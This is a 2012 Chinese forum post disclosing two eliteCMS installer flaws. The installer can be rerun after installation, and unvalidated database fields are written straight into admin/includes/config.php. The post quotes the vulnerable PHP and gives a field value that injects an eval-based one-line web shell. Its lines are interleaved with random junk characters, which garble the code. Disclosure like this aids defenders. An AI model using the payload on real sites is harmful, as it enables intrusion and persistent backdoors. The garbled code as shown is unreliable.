eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装" J$ f$ v& R: F' ^& @% L9 b
4 O/ s4 c d8 a' F/ z, f另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php
* [! a3 g' z/ {- Z7 ^: ?我们来看代码:
. X! x: {$ l8 q+ D1 R
, l. v& G+ O1 j! w4 Z; B...
7 i2 j V2 D% h# Z B E; o8 L |elseif ($_GET['step'] == "4") {
# L# i0 F" D! C5 N, B $file = "../admin/includes/config.php";
5 n6 R Q' G2 ~% @ $write = "<?php\n";
" T! S6 T+ o& d" W! |- u $write .= "/**\n";+ o9 U/ a) a% F; y5 D+ j6 {' r
$write .= "*\n";
9 o3 `$ G' f4 W D $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
8 {# {$ `/ n x# |" q |: V" m, z( b...略...
6 F. F/ _% o1 x $write .= "*\n";
! ~2 m6 N9 f, k, M1 H {; z $write .= "*/\n";
( t/ S; c% }: i* v6 [; g $write .= "\n";$ ]8 F$ w1 h: P- ?+ F- O) H+ H9 I
$write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
; I% K0 i) a# T- u$ u1 j n $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
3 o1 P' r* |. E6 \ $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";( x8 S5 o p; D9 z! a
$write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";( ~$ j: b: A! F# v
$write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
4 o, t0 e( q* C. j $write .= "if (!\$connection) {\n";, L% T+ i+ Z' C" D& ]% z
$write .= " die(\"Database connection failed\" .mysql_error());\n";
6 l6 y% r$ @+ |( V- @ $write .= " \n";
5 m& h5 d% }1 x( \) ] $write .= "} \n";
l4 {& z2 w' A0 E) q $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
3 U+ K2 ]+ H1 t5 ]* L) y $write .= "if (!\$db_select) {\n";
- S# z% J$ U4 a; C2 n* t $write .= " die(\"Database select failed\" .mysql_error());\n";2 E! ?3 H" T0 c: e, e% ^
$write .= " \n";
5 F6 Q8 u0 z9 K1 g3 m' x $write .= "} \n";
* f# q4 o7 W* B+ K $write .= "?>\n";
! n$ v9 H/ q+ d# J
% M. V( C4 j3 ^, ? $writer = fopen($file, 'w');
* x0 p9 r) Z( s% j7 U9 Q" Q5 h...: U# I* s0 d. g2 {/ @; Y' M# a5 Q
$ _4 T; U! E5 _& Y/ Q3 V0 I0 r7 x, U在看代码:
* b0 @; W% e+ a$ U* [ 0 O* k* N" e) S
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];7 f* x0 E& }: a, }( p+ E
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
9 f4 {3 }7 n! ^$_SESSION['DB_USER'] = $_POST['DB_USER'];
. x$ T: P' p: ?; v$_SESSION['DB_PASS'] = $_POST['DB_PASS'];% E0 c6 B; B" t2 d% @8 N* G% ^
) Q* w! p- o' X: y4 s8 n取值未作任何验证 B. \9 K7 V/ N: i( y* f
如果将数据库名POST数据:/ _4 x# q! e* |9 {* Q- E% Y
}3 \8 N* D G; N
"?><?php eval($_POST[c]);?><?php
) w4 e# j8 w; `9 X7 m* Z( R
' L5 J" g: H* [6 l0 _. ~* Y& D将导致一句话后门写入/admin/includes/config.php- I5 Q/ E6 F; |# h8 [
|
发表于 2012-11-18 13:59:27
收藏
支持
反对